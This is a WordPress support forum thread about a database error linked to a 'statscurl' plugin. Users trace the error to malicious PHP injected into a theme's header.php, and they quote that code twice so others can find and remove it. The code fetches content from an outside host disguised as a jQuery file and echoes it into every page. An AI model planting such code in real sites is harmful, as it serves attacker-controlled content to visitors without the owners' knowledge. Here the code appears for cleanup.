De-activate the ‘statscurl’ plugin?
I am also having this same issue…
“
Couldn’t connect to database server.Couldn’t find database admin_4llw4d.An unexpected problem has occured with the application.
SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;
“
PLEASE HELP!!!!!
Found that [redacted]!
open up Editor
Find “
<?php
if(function_exists(‘curl_init’))
{
$url = “http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
“
Delete that shit… and your good [:
I am having the same issues, but I do not use any plugin for stats.
Log in to wp-admin
Open Appearance
Open Editor
Open Header (header.php)
Find the code
“
<?php
if(function_exists(‘curl_init’))
{
$url = “http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
“
Delete / Remove the code
Save / Update File
The error code will be gone
If the error disappears when statscurl plugin is deactivated it is confirmed that the plugin is causing the error.
The error shows that the plugin is not able to connect to the respective database.
Better you guys look for the plugin forum, hope that they have come up with the fix.
Yeah right this error showing because of plugins. same problem with